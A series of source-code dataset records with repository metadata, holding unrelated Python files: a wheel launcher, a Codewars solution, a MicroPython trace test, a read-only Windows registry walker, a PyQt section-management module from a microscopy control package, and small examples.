1ce15ec0a75c7d5b1b1db406679c60d7f009833e | 6c53847f9956edc8f31b23c24b1786d1b9789f03 | /tacker/venv/bin/wheel | 86288a383455d2b1f18e3d5a11af91fdaf3673c4 | [] | no_license | kunal1510010/Quikmile | c64a9264798cf834aaf32ecb4653b9b81dab0dd5 | 244d2749eb8438ce858de51c088a52ca3de58992 | refs/heads/master | 2022-12-12T08:03:50.628252 | 2018-11-29T15:24:46 | 2018-11-29T15:24:46 | 159,226,383 | 0 | 0 | null | 2022-12-08T02:27:44 | 2018-11-26T20:10:20 | Python | UTF-8 | Python | false | false | 235 | #!/home/kunal/Desktop/cas/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
e8a969c5226b7404f99680e5874e25631fa54af4 | 964b063c2461aad267ddd991fefaf7ab53b1ca94 | /8-kyu/plural/python/solution.py | 299175ea2855b95721abb6031ba1809c291de123 | [] | no_license | lucasbflopes/codewars-solutions | 26c4e2cd1be19db50cc8c1d9fc117c51c82a2259 | 72ef2c02dde7bd0d5a691e04e3b2a383e892f84b | refs/heads/master | 2022-03-14T01:26:41.816498 | 2019-11-23T17:17:19 | 2019-11-23T17:17:19 | 114,834,447 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 36 | py | def plural(n):
return not n == 1 | [
"[email protected]"
] | |
fe351d2472b7dbfcf0af804a27e8f390c8ff6337 | 4ddf82eeb31d46fb67802a4375390eb42a8f23b8 | /tests/misc/sys_settrace_subdir/trace_generic.py | 111a9d19ff30dda48e0212bcf758d99032cd8a9c | [
"MIT"
] | permissive | pulkin/micropython | 1437a507b9e90c8824e80c3553e6209d89e64565 | c274c947c611f510fd2b1c4ef6cbd9f4283794fc | refs/heads/master | 2023-03-08T02:35:28.208819 | 2022-04-19T12:38:47 | 2022-04-19T12:38:47 | 167,732,676 | 103 | 36 | MIT | 2023-02-25T03:02:36 | 2019-01-26T19:57:59 | C | UTF-8 | Python | false | false | 1,540 | py | print("Now comes the language constructions tests.")
# function
def test_func():  # NOTE: only same-line comments here -- line numbers feed the trace expectations
    def test_sub_func():  # nested def: traced call one level deeper
        print("test_function")
    test_sub_func()
# closure
def test_closure(msg):  # returns a closure over `msg`; traced when later called
    def make_closure():
        print(msg)
    return make_closure
# exception
def test_exception():  # raise/except/finally path under the tracer
    try:
        raise Exception("test_exception")
    except Exception:  # swallowed on purpose -- only the trace events matter
        pass
    finally:
        pass
# listcomp
def test_listcomp():  # list comprehension executes in its own traced frame
    print("test_listcomp", [x for x in range(3)])
# lambda
def test_lambda():  # lambda body is traced like a tiny function
    func_obj_1 = lambda a, b: a + b
    print(func_obj_1(10, 20))
# import
def test_import():  # import machinery + calls into the imported module
    from sys_settrace_subdir import trace_importme
    trace_importme.dummy()
    trace_importme.saysomething()
# class
class TLClass:  # top-level class body: executed (and traced) at import time
    def method():  # never called; only its definition is traced
        pass
    pass
def test_class():  # class def, method call and property get/set under the tracer
    class TestClass:
        __anynum = -9  # name-mangled attribute backing the property
        def method(self):
            print("test_class_method")
            self.__anynum += 1
        def prprty_getter(self):
            return self.__anynum
        def prprty_setter(self, what):
            self.__anynum = what
        prprty = property(prprty_getter, prprty_setter)
    cls = TestClass()
    cls.method()
    print("test_class_property", cls.prprty)  # getter fires here
    cls.prprty = 12  # setter fires here
    print("test_class_property", cls.prprty)
def run_tests():  # drives every construct once while sys.settrace is active
    test_func()
    test_closure_inst = test_closure("test_closure")
    test_closure_inst()
    test_exception()
    test_listcomp()
    test_lambda()
    test_class()
    test_import()
    print("And it's done!")
| [
"[email protected]"
] | |
c3accd3358621940fbdad50b1177f4ec90add8aa | 262195faec1b59ff67067f2dc7e3eb7db8dba946 | /src/setting sourcetoUTFformat.py | bf517cbcb3910c6092860bfe0e945eeba0ded980 | [
"MIT"
] | permissive | sudeep0901/python | 3a090ae2cd8a61e8e375cebb4722c051d2d766aa | 7a50af12e72d21ca4cad7f2afa4c6f929552043f | refs/heads/master | 2022-04-21T14:15:25.606241 | 2020-04-13T02:35:56 | 2020-04-13T02:35:56 | 155,167,294 | 0 | 0 | MIT | 2020-03-07T06:59:36 | 2018-10-29T07:08:06 | Jupyter Notebook | UTF-8 | Python | false | false | 109 | py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
s = "Jalape" # String in quotes is directly encoded in UTF-8.
| [
"[email protected]"
] | |
48853301e1d5994fd62e2e7ac0424f3762a446ea | 3a4fbde06794da1ec4c778055dcc5586eec4b7d2 | /@lib/01-18-2008-01/vyperlogix/win/registry/reg_walker.py | cc8b06833bd146af47d7804a83c6d80b046dc6b6 | [] | no_license | raychorn/svn_python-django-projects | 27b3f367303d6254af55c645ea003276a5807798 | df0d90c72d482b8a1e1b87e484d7ad991248ecc8 | refs/heads/main | 2022-12-30T20:36:25.884400 | 2020-10-15T21:52:32 | 2020-10-15T21:52:32 | 304,455,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,134 | py | import _winreg
__copyright__ = """\
(c). Copyright 2008-2011, Vyper Logix Corp., All Rights Reserved.
Published under Creative Commons License
(http://creativecommons.org/licenses/by-nc/3.0/)
restricted to non-commercial educational use only.,
http://www.VyperLogix.com for details
THE AUTHOR VYPER LOGIX CORP DISCLAIMS ALL WARRANTIES WITH REGARD TO
THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS, IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL,
INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING
FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
WITH THE USE OR PERFORMANCE OF THIS SOFTWARE !
USE AT YOUR OWN RISK.
"""
def walk(top, writeable=False):
    """walk the registry starting from the key represented by
    top in the form HIVE\\key\\subkey\\..\\subkey and generating
    (key_name, key), subkey_names, values at each level.

    subkey_names are simply names of the subkeys of that key
    values are 3-tuples containing (name, data, data-type).
    See the documentation for _winreg.EnumValue for more details.

    If the key cannot be opened (missing key, access denied, or an
    unknown hive name) an empty node with key=None is yielded, matching
    the previous best-effort behaviour.
    """
    keymode = _winreg.KEY_READ
    if writeable:
        keymode |= _winreg.KEY_SET_VALUE

    if "\\" not in top: top += "\\"
    root, subkey = top.split ("\\", 1)
    try:
        key = _winreg.OpenKey (getattr (_winreg, root), subkey, 0, keymode)
    except (OSError, AttributeError):
        # OSError (WindowsError): key missing or access denied.
        # AttributeError: `root` is not a valid hive name on _winreg.
        # (A bare `except:` previously swallowed everything, including
        # KeyboardInterrupt -- now narrowed to the expected failures.)
        key = None

    subkeys = []
    values = []
    if key:
        i = 0
        while True:
            try:
                subkeys.append (_winreg.EnumKey (key, i))
                i += 1
            except EnvironmentError:
                # EnumKey raises when the index runs past the last subkey.
                break
        i = 0
        while True:
            try:
                values.append (_winreg.EnumValue (key, i))
                i += 1
            except EnvironmentError:
                # EnumValue raises when the index runs past the last value.
                break

    yield (top, key), subkeys, values
    # Depth-first recursion into every subkey.
    for subkey in subkeys:
        for result in walk (top.rstrip ("\\") + "\\" + subkey, writeable):
            yield result
| [
"[email protected]"
] | |
bb8ebe09cc5951038ac84d4a52cdc743bcf2eb2d | fb124e51024917d6479fa626d9607ff10f7a3aba | /storm-control/storm_control/steve/sections.py | 2a30384238f3ecf6446cca440e00b7198af7eebe | [
"MIT"
] | permissive | BehnamAbaie/storm-control | 054bd7bbd903ed9635e4d1121c30544f58473c4f | 0c686321142eccad62ce3365eae22c3b69229b0d | refs/heads/main | 2023-06-18T08:04:01.108874 | 2021-07-14T00:51:15 | 2021-07-14T00:51:15 | 342,049,487 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,245 | py | #!/usr/bin/env python
"""
The handles all the UI elements in the Mosaic tab.
Hazen 10/18
"""
import numpy
from PyQt5 import QtCore, QtGui, QtWidgets
import storm_control.sc_library.hdebug as hdebug
import storm_control.steve.coord as coord
import storm_control.steve.imageCapture as imageCapture
import storm_control.steve.positions as positions
import storm_control.steve.qtdesigner.sections_ui as sectionsUi
import storm_control.steve.steveItems as steveItems
import storm_control.steve.steveModule as steveModule
class SectionItem(steveItems.SteveItem):
    """A section marker, drawn as a small ellipse in the graphics scene.

    Class attributes hold shared rendering resources; `ellipse_size` and
    the pen widths are overwritten from parameters in Sections.__init__().
    """
    brush = QtGui.QBrush(QtGui.QColor(255,255,255,0))
    counter = 0  # class-wide counter used to assign a unique index per item
    data_type = "section"
    deselected_pen = QtGui.QPen(QtGui.QColor(0,0,255))
    fields = ["x", "y", "angle"]
    selected_pen = QtGui.QPen(QtGui.QColor(255,0,0))
    ellipse_size = 1

    def __init__(self, a_point = None, **kwds):
        super().__init__(**kwds)

        self.a_point = None
        self.angle = 0

        # Not used. The previous version of Steve kept track
        # of the section number so we maintain that.
        #
        # Bug fix: increment the *class* attribute. The old
        # `self.counter += 1` only created an instance attribute that
        # shadowed the class one, so every section got index 0.
        self.index = SectionItem.counter
        SectionItem.counter += 1

        self.x_size = coord.umToPix(self.ellipse_size)
        self.y_size = coord.umToPix(self.ellipse_size)
        self.graphics_item = QtWidgets.QGraphicsEllipseItem(0, 0, self.x_size, self.y_size)
        self.graphics_item.setBrush(self.brush)
        self.graphics_item.setPen(self.deselected_pen)
        self.graphics_item.setZValue(999.0)
        self.setLocation(a_point)

    def changeField(self, field, df):
        """Increment `field` ("x"/"y" in um, "angle" in degrees) by `df`."""
        if (field == "x"):
            self.movePosition(df, 0.0)
        elif (field == "y"):
            self.movePosition(0.0, df)
        elif (field == "angle"):
            # Keep the angle wrapped into [0, 360).
            self.angle += df
            if (self.angle > 360.0):
                self.angle -= 360.0
            if (self.angle < 0.0):
                self.angle += 360.0
        else:
            assert False, "No field " + field + "!"

    def getAngle(self):
        return self.angle

    def getField(self, field):
        """Return the current value of `field`; must match self.fields."""
        if (field == "x"):
            return self.a_point.x_um
        elif (field == "y"):
            return self.a_point.y_um
        elif (field == "angle"):
            return self.angle
        else:
            assert False, "No field " + field + "!"

    def getLocation(self):
        return self.a_point

    def movePosition(self, dx_um, dy_um):
        """Translate the section by (dx_um, dy_um) microns."""
        a_point = coord.Point(self.a_point.x_um + dx_um,
                              self.a_point.y_um + dy_um,
                              "um")
        self.setLocation(a_point)

    def saveItem(self, directory, name_no_extension):
        """Return this section as a 'index,x,y,angle' CSV line."""
        a_list = [self.index, self.a_point.x_um, self.a_point.y_um, self.angle]
        return "{0:0d},{1:.2f},{2:.2f},{3:.2f}".format(*a_list)

    def setAngle(self, angle):
        self.angle = angle

    def setLocation(self, a_point):
        """Move the ellipse so that it is centered on `a_point`."""
        self.a_point = a_point
        self.graphics_item.setPos(a_point.x_pix - 0.5 * self.x_size,
                                  a_point.y_pix - 0.5 * self.y_size)

    def setSelected(self, selected):
        """
        If the object is selected, increase it's z value and change the pen
        color, otherwise set the object's z value and pen color back to the
        unselected values.
        """
        if selected:
            self.graphics_item.setZValue(1999.0)
            self.graphics_item.setPen(self.selected_pen)
        else:
            self.graphics_item.setZValue(999.0)
            self.graphics_item.setPen(self.deselected_pen)

    def setVisible(self, visible):
        self.graphics_item.setVisible(visible)
class SectionItemLoader(steveItems.SteveItemLoader):
    """Re-creates a SectionItem from values stored in a mosaic file."""

    def load(self, directory, index, x, y, angle):
        location = coord.Point(float(x), float(y), "um")
        item = SectionItem(a_point = location)
        item.setAngle(float(angle))
        return item
class Sections(steveModule.SteveModule):
"""
This is the main class / the interface with steve.
"""
@hdebug.debug
def __init__(self, image_capture = None, **kwds):
super().__init__(**kwds)
self.image_capture = image_capture
self.initialized = False
SectionItem.ellipse_size = self.parameters.get("ellipse_size")
SectionItem.deselected_pen.setWidth(self.parameters.get("pen_width"))
SectionItem.selected_pen.setWidth(self.parameters.get("pen_width"))
self.ui = sectionsUi.Ui_Form()
self.ui.setupUi(self)
# Hide some things we don't use.
self.ui.backgroundComboBox.hide()
self.ui.backgroundLabel.hide()
self.ui.moveAllSectionsCheckBox.hide()
self.ui.showFeaturesCheckBox.hide()
self.ui.thresholdLabel.hide()
self.ui.thresholdSlider.hide()
# Model to store sections.
self.sections_model = QtGui.QStandardItemModel()
self.sections_model.setHorizontalHeaderLabels([""] + SectionItem.fields)
# Section renderer.
self.sections_renderer = SectionsRenderer(scene = self.item_store.getScene())
# View to manipulate sections.
self.sections_table_view = SectionsTableView(item_store = self.item_store,
step_size = self.parameters.get("step_size"))
self.sections_table_view.setModel(self.sections_model)
self.sections_table_view.setTitleBar(self.ui.sectionsGroupBox)
self.sections_table_view.horizontalHeader().setStretchLastSection(True)
self.sections_table_view.horizontalHeader().setMinimumSectionSize(20)
layout = QtWidgets.QVBoxLayout(self.ui.sectionsGroupBox)
layout.addWidget(self.sections_table_view)
layout.setContentsMargins(0,0,0,0)
self.ui.sectionsGroupBox.setLayout(layout)
# View to display section renders.
self.sections_view = SectionsView()
layout = QtWidgets.QVBoxLayout(self.ui.sectionsDisplayFrame)
layout.addWidget(self.sections_view)
self.ui.sectionsDisplayFrame.setLayout(layout)
# Connect signals.
self.ui.foregroundOpacitySlider.valueChanged.connect(self.handleForegroundOpacitySlider)
self.sections_model.itemChanged.connect(self.handleItemChanged)
self.sections_table_view.currentChangedEvent.connect(self.handleCurrentChangedEvent)
self.sections_view.changeSizeEvent.connect(self.handleChangeSizeEvent)
self.sections_view.changeZoomEvent.connect(self.handleChangeZoomEvent)
self.sections_view.pictureEvent.connect(self.handlePictureEvent)
self.sections_view.positionEvent.connect(self.handlePositionEvent)
self.sections_view.updateEvent.connect(self.handleUpdateEvent)
# Set mosaic file loader. This handles loading SectionItems from a mosaic file.
self.item_store.addLoader(SectionItem.data_type, SectionItemLoader())
def addSection(self, a_point, a_angle):
    """
    Add a single section to the scene and to the model.

    a_point - location for the new section (passed to SectionItem(a_point = ...)).
    a_angle - rotation for the new section (passed to SectionItem.setAngle()).
    """
    # Create section item.
    section_item = SectionItem(a_point = a_point)
    section_item.setAngle(a_angle)

    # Add to scene.
    self.item_store.addItem(section_item)

    # Add to model.
    self.addSectionItem(section_item)
def addSectionItem(self, section_item):
    """
    Add a single section item to the model.
    """
    # Add to model. The elements in a row all share the same item.
    row = []
    # Column 0 holds the checkbox; its check state selects the section for
    # inclusion in the averaged background (see updateSectionView()).
    item = SectionsStandardItem(section_item = section_item)
    item.setCheckable(True)
    row.append(item)
    # One value column per SectionItem field.
    for field in section_item.fields:
        row.append(SectionsStandardItem(field = field,
                                        section_item = section_item))
    self.sections_model.appendRow(row)
    self.sections_table_view.updateTitle()

    # Resize if this is the first element added.
    if not self.initialized:
        self.sections_table_view.resizeColumnsToContents()
        self.initialized = True
def currentTabChanged(self, tab_index):
    """
    Hide every SectionItem while tab 1 is active; show them on any
    other tab.
    """
    visible = (tab_index != 1)
    for elt in self.item_store.itemIterator(item_type = SectionItem):
        elt.setVisible(visible)
def handleAddSection(self, ignored):
    """
    This is called by the popup menu in the mosaic tab or a
    key press event in the mosaics view.

    ignored - unused (Qt action 'triggered' boolean).
    """
    # New sections start at the last mosaic event location with angle 0.
    self.addSection(self.mosaic_event_coord, 0)
def handleChangeSizeEvent(self, width, height):
    # Keep the off-screen renderer the same size as the sections view
    # (connected to SectionsView.changeSizeEvent), then re-render.
    self.sections_renderer.setRenderSize(width, height)
    self.updateSectionView()
def handleChangeZoomEvent(self, new_scale):
    # Propagate the view's zoom (SectionsView.changeZoomEvent) to the
    # renderer, then re-render.
    self.sections_renderer.setRenderScale(new_scale)
    self.updateSectionView()
def handleCurrentChangedEvent(self):
    # The selected table row changed, so the foreground render is stale.
    self.updateSectionView()
def handleForegroundOpacitySlider(self, new_value):
    # Slider value controls the foreground overlay opacity (scaled by
    # 0.01 in SectionsView.changeOpacity()).
    self.sections_view.changeOpacity(new_value)
def handleItemChanged(self, item):
    """
    This is called whenever a section's value changes. Any change can
    affect the rendered images, so re-render both layers.
    """
    self.updateSectionView()
def handlePictureEvent(self, pict_type):
    """
    Take pictures at/around each section location.

    pict_type - "s1" single shot per section, "s3"/"s5" a 3/5 picture
                spiral per section, "g" a grid of shots per section
                (grid size from image_capture.getGridSize()).
    """
    # NOTE(review): indentation was reconstructed; the spiral/grid offsets
    # are taken per section (inside the loop), matching the "at each
    # section" wording -- confirm against the original file.
    movie_queue = []

    # Single picture at each section.
    if (pict_type == "s1"):
        for item in self.sectionsStandardItemIterator():
            movie_queue.append(item.getSectionItem().getLocation())

    # Three picture spiral at each section.
    elif (pict_type == "s3"):
        for item in self.sectionsStandardItemIterator():
            movie_queue.append(item.getSectionItem().getLocation())
            movie_queue += imageCapture.createSpiral(3)

    # Five picture spiral at each section.
    elif (pict_type == "s5"):
        for item in self.sectionsStandardItemIterator():
            movie_queue.append(item.getSectionItem().getLocation())
            movie_queue += imageCapture.createSpiral(5)

    # Picture grid at each section.
    elif (pict_type == "g"):
        for item in self.sectionsStandardItemIterator():
            movie_queue.append(item.getSectionItem().getLocation())
            movie_queue += imageCapture.createGrid(*self.image_capture.getGridSize())

    # Nothing to do when there are no (checked) sections.
    if (len(movie_queue) > 0):
        self.image_capture.takeMovies(movie_queue)
def handlePositionEvent(self):
    """
    Add a position at each section.
    """
    #
    # When we change back to the mosaic tab the Positions class will
    # update it's model by querying the item store, so it is
    # sufficient to just add the new positions to the item store.
    #
    for item in self.sectionsStandardItemIterator():
        pos_item = positions.PositionItem(a_point = item.getSectionItem().getLocation())
        self.item_store.addItem(pos_item)
    # Refresh once after all positions have been added.
    self.updateSectionView()
def handleUpdateEvent(self):
    # Explicit refresh requested from the sections view ('u' key).
    self.updateSectionView()
def mosaicLoaded(self):
    # Clear the current sections model. We need to do this otherwise
    # we'll get duplicates of whatever is currently in the model.
    # NOTE(review): QStandardItemModel.clear() also drops the horizontal
    # header labels set at construction time -- confirm the headers still
    # display correctly after loading a mosaic.
    self.sections_model.clear()
    # Re-populate from the SectionItems the loader put in the item store.
    for section_item in self.item_store.itemIterator(item_type = SectionItem):
        self.addSectionItem(section_item)
def sectionsStandardItemIterator(self):
    """Yield the column 0 SectionsStandardItem of every model row."""
    for i in range(self.sections_model.rowCount()):
        index = self.sections_model.index(i,0)
        item = self.sections_model.itemFromIndex(index)
        if isinstance(item, SectionsStandardItem):
            yield item
def updateSectionView(self):
    """
    Update the image in the section view.

    The background is the average of the renders of all checked
    sections; the foreground is the render of the currently selected
    section.
    """
    # FIXME? Usually only the background or the foreground will need to
    #        be updated, not both. This could be more efficient.

    # Create background image.
    counts = 0
    numpy_bg = None
    for item in self.sectionsStandardItemIterator():
        if (item.checkState() == QtCore.Qt.Checked):
            temp = self.sections_renderer.renderSectionNumpy(item.getSectionItem())
            if numpy_bg is not None:
                numpy_bg += temp
            else:
                numpy_bg = temp
            counts += 1

    if numpy_bg is not None:
        # counts >= 1 whenever numpy_bg is set, so no division by zero.
        numpy_bg = numpy_bg/float(counts)
        numpy_bg = numpy_bg.astype(numpy.uint8)
        image = QtGui.QImage(numpy_bg.data,
                             numpy_bg.shape[1],
                             numpy_bg.shape[0],
                             QtGui.QImage.Format_RGB32)
        # This QImage constructor does not copy the buffer; stash
        # references on the Qt objects so the numpy data stays alive
        # for as long as they do.
        image.ndarray = numpy_bg
        pixmap = QtGui.QPixmap.fromImage(image)
        pixmap.qimage = image
        self.sections_view.setBackgroundPixmap(pixmap)

    # Create foreground image from the selected row, if any.
    current_item = self.sections_model.itemFromIndex(self.sections_table_view.currentIndex())
    if isinstance(current_item, SectionsStandardItem):
        pixmap = self.sections_renderer.renderSectionPixmap(current_item.getSectionItem())
        self.sections_view.setForegroundPixmap(pixmap)
    self.sections_view.update()
class SectionsRenderer(QtWidgets.QGraphicsView):
    """
    Handles rendering sections. It works by using the same QGraphicsScene as displayed in
    the Mosaic tab. To render a section, it centers on the section, adjusts the angle and
    scale rotation as appropriate, then grabs the contents of its viewport.

    This object is not actually visible in the UI.
    """
    def __init__(self, scene = None, **kwds):
        super().__init__(**kwds)

        self.scale = 0.5

        self.setScene(scene)
        self.setRenderHint(QtGui.QPainter.SmoothPixmapTransform)
        # Scroll bars would otherwise appear in the grabbed viewport image.
        self.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
        self.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)

    def renderSectionNumpy(self, section_item):
        """
        Draw the section pixmap & convert to a (height, width, 4) numpy array.
        """
        pixmap = self.renderSectionPixmap(section_item)
        image = pixmap.toImage()
        ptr = image.bits()
        # NOTE: image.bits() has been observed to occasionally return None
        # (see file history); if that recurs, guard before setsize().
        ptr.setsize(image.byteCount())
        # Fix: numpy.float was a deprecated alias for the builtin float
        # (i.e. float64) and was removed in NumPy 1.24; use float64.
        numpy_array = numpy.asarray(ptr).reshape(image.height(), image.width(), 4).astype(numpy.float64)
        return numpy_array

    def renderSectionPixmap(self, section_item):
        """
        Draw the section pixmap: center on the section, apply its rotation
        and the current render scale, then grab the viewport contents.
        """
        a_point = section_item.getLocation()
        self.centerOn(a_point.x_pix, a_point.y_pix)
        transform = QtGui.QTransform()
        transform.rotate(section_item.getAngle())
        transform.scale(self.scale, self.scale)
        self.setTransform(transform)
        return self.grab()

    def setRenderScale(self, new_scale):
        # Takes effect on the next renderSectionPixmap() call.
        self.scale = new_scale

    def setRenderSize(self, width, height):
        self.setFixedSize(width, height)
class SectionsStandardItem(QtGui.QStandardItem):
    """
    One model cell for a section. Column 0 cells are created with
    field = None (checkbox only); value cells display one SectionItem
    field, formatted to two decimal places.
    """
    def __init__(self, field = None, section_item = None, **kwds):
        super().__init__(**kwds)
        self.field = field                  # Name of the displayed field, or None.
        self.section_item = section_item    # The underlying SectionItem.
        self.updateSectionText()

    def changeValue(self, df):
        # Adjust the underlying field by df, then refresh the cell text.
        self.section_item.changeField(self.field, df)
        self.updateSectionText()

    def getSectionItem(self):
        return self.section_item

    def setSelected(self, selected):
        # Forward selection state to the graphics item.
        self.section_item.setSelected(selected)

    def updateSectionText(self):
        if self.field is not None:
            self.setText("{0:.2f}".format(self.section_item.getField(self.field)))
class SectionsTableView(QtWidgets.QTableView):
    """
    Table of sections. Keyboard driven: 'w'/'s' nudge the selected value,
    'backspace'/'delete' remove the selected row.
    """
    currentChangedEvent = QtCore.pyqtSignal()

    def __init__(self, item_store = None, step_size = None, **kwds):
        super().__init__(**kwds)
        self.initialized_widths = False
        self.item_store = item_store
        self.step_size = step_size
        # Fix: title_bar was only assigned in setTitleBar(), so calling
        # updateTitle() before setTitleBar() raised AttributeError.
        self.title_bar = None

        # Disable direct editing; values are changed via key presses.
        self.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
        self.setToolTip("'w','s' to change selected cell value, 'backspace' to delete row, arrow keys to change cells.")

    def currentChanged(self, current, previous):
        """
        Called when the currently selected item in the table changes.
        Moves the 'selected' highlight from the old section to the new one.
        """
        previous_item = self.model().itemFromIndex(previous)
        if isinstance(previous_item, SectionsStandardItem):
            previous_item.setSelected(False)

        current_item = self.model().itemFromIndex(current)
        if isinstance(current_item, SectionsStandardItem):
            current_item.setSelected(True)
        self.currentChangedEvent.emit()

    def keyPressEvent(self, event):
        """
        Handle editing keys. Only active when a value column (column > 0)
        is selected; everything else falls through to QTableView.
        """
        current_column = self.currentIndex().column()
        current_item = self.model().itemFromIndex(self.currentIndex())
        if isinstance(current_item, SectionsStandardItem) and (current_column > 0):
            which_key = event.key()

            # Delete current item (from both the model and the item store).
            if (which_key == QtCore.Qt.Key_Backspace) or (which_key == QtCore.Qt.Key_Delete):
                self.model().removeRow(self.currentIndex().row())
                self.item_store.removeItem(current_item.section_item.getItemID())
                self.updateTitle()

            # Nudge the selected field by one step.
            elif (which_key == QtCore.Qt.Key_W):
                current_item.changeValue(-self.step_size)
            elif (which_key == QtCore.Qt.Key_S):
                current_item.changeValue(self.step_size)
            else:
                super().keyPressEvent(event)
        else:
            super().keyPressEvent(event)

    def setTitleBar(self, title_bar):
        self.title_bar = title_bar

    def updateTitle(self):
        # No-op until a title bar widget has been attached.
        if self.title_bar is not None:
            n = self.model().rowCount()
            if (n == 0):
                self.title_bar.setTitle("Sections")
            else:
                self.title_bar.setTitle("Sections ({0:d} total)".format(n))
class SectionsView(QtWidgets.QWidget):
    """
    Displays the sections: an averaged background image, the currently
    selected section as a translucent foreground overlay, and faint
    centering guide lines.
    """
    changeSizeEvent = QtCore.pyqtSignal(int, int)
    changeZoomEvent = QtCore.pyqtSignal(float)
    pictureEvent = QtCore.pyqtSignal(str)
    positionEvent = QtCore.pyqtSignal()
    updateEvent = QtCore.pyqtSignal()

    def __init__(self, **kwds):
        super().__init__(**kwds)
        self.background_pixmap = None
        self.foreground_opacity = 0.5
        self.foreground_pixmap = None
        self.scale = 1.0

        self.pictAct = QtWidgets.QAction(self.tr("Take Pictures"), self)
        self.posAct = QtWidgets.QAction(self.tr("Record Positions"), self)

        self.popup_menu = QtWidgets.QMenu(self)
        self.popup_menu.addAction(self.pictAct)
        self.popup_menu.addAction(self.posAct)

        self.pictAct.triggered.connect(self.handlePictAct)
        self.posAct.triggered.connect(self.handlePosAct)

        self.setFocusPolicy(QtCore.Qt.ClickFocus)
        self.setToolTip("' ', '1', '3', '5', 'g' to take pictures at each section.\n'u' to force an update.")

    def changeOpacity(self, new_value):
        # new_value is the raw slider value; opacity is 0.0 - 1.0.
        self.foreground_opacity = 0.01 * new_value
        self.update()

    def handlePictAct(self, boolean):
        self.pictureEvent.emit("s1")

    def handlePosAct(self, boolean):
        self.positionEvent.emit()

    def keyPressEvent(self, event):
        """
        ' '/'1' Take a single picture at each section.
        '3' Take a 3 picture spiral at each section.
        '5' Take a 5 picture spiral at each section.
        'g' Take a grid of pictures at each section.
        'u' Force a display update.
        """
        # Picture taking.
        if (event.key() == QtCore.Qt.Key_Space):
            self.pictureEvent.emit("s1")
        elif (event.key() == QtCore.Qt.Key_1):
            self.pictureEvent.emit("s1")
        elif (event.key() == QtCore.Qt.Key_3):
            self.pictureEvent.emit("s3")
        elif (event.key() == QtCore.Qt.Key_5):
            self.pictureEvent.emit("s5")
        elif (event.key() == QtCore.Qt.Key_G):
            self.pictureEvent.emit("g")

        # Force a display update.
        elif (event.key() == QtCore.Qt.Key_U):
            self.updateEvent.emit()

        super().keyPressEvent(event)

    def paintEvent(self, event):
        """
        Draw a white background, the background pixmap (if it exists), the foreground
        pixmap (if it exists) and the centering guide lines.
        """
        painter = QtGui.QPainter(self)
        color = QtGui.QColor(255,255,255)
        painter.setPen(color)
        painter.setBrush(color)
        painter.drawRect(0, 0, self.width(), self.height())

        # Fix: these offsets used '/', which is float division under
        # Python 3; PyQt5's integer drawPixmap()/drawLine() overloads
        # raise TypeError for floats, so use floor division instead.

        # Draw background pixmap, centered.
        painter.setOpacity(1.0)
        if self.background_pixmap is not None:
            x_loc = (self.width() - self.background_pixmap.width())//2
            y_loc = (self.height() - self.background_pixmap.height())//2
            painter.drawPixmap(x_loc, y_loc, self.background_pixmap)

        # Draw foreground pixmap, centered, at the configured opacity.
        painter.setOpacity(self.foreground_opacity)
        if self.foreground_pixmap is not None:
            x_loc = (self.width() - self.foreground_pixmap.width())//2
            y_loc = (self.height() - self.foreground_pixmap.height())//2
            painter.drawPixmap(x_loc, y_loc, self.foreground_pixmap)

        # Draw faint centering guide lines.
        painter.setOpacity(0.2)
        x_mid = self.width()//2
        y_mid = self.height()//2
        painter.drawLine(0, y_mid, self.width(), y_mid)
        painter.drawLine(x_mid, 0, x_mid, self.height())

    def mousePressEvent(self, event):
        if event.button() == QtCore.Qt.RightButton:
            self.popup_menu.exec_(event.globalPos())

    def resizeEvent(self, event):
        self.changeSizeEvent.emit(self.width(), self.height())

    def setBackgroundPixmap(self, pixmap):
        self.background_pixmap = pixmap

    def setForegroundPixmap(self, pixmap):
        self.foreground_pixmap = pixmap

    def wheelEvent(self, event):
        # Mouse wheel zooms the section render in/out by 20% steps.
        if not event.angleDelta().isNull():
            if (event.angleDelta().y() > 0):
                self.scale = self.scale * 1.2
            else:
                self.scale = self.scale / 1.2
            self.changeZoomEvent.emit(self.scale)
| [
"[email protected]"
] | |
291a893cff8acb6ab12dbcd9775261b0581e06d9 | 0b6d99c3ecc9a4d937345b85a80fb6558a4da397 | /function/lambda/c2.py | c9fd53c24893736eff8d2d9d4d3629a7db8bac0c | [] | no_license | huiup/python_notes | 3057058154d2b6ba0514913b9e55421614e1ea5e | 60f5513cefef054aec0deb4ca1b2eb9fdc263f9d | refs/heads/master | 2021-03-01T20:16:31.904703 | 2020-11-03T13:09:51 | 2020-11-03T13:09:51 | 245,811,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 63 | py | #三元表达式
# Equivalent of the ternary expression `r = x if x > y else y`,
# written out as an explicit if/else statement.
x = 4
y = 3
if x > y:
    r = x
else:
    r = y
print(r)
"[email protected]"
] | |
c7dfc7725d763e85132830b5dcd849e65bf137c2 | bf0d7c8d987d5fda14208eb9ce70e31c83c25c25 | /c-ex4/plot_logs.py | 6151e8784b9f8a3d48023b055e5894d81ed693d0 | [] | no_license | SummerBigData/SamRepo | 7876e9393c7175e300e175a60c17633c3b23a1bb | fd84ad654370faa48c084349952c2921fde4032d | refs/heads/master | 2020-03-18T05:09:08.787956 | 2018-06-18T17:11:49 | 2018-06-18T17:11:49 | 134,327,137 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,894 | py | import numpy as np
import pandas as pd
from plotly.offline import plot
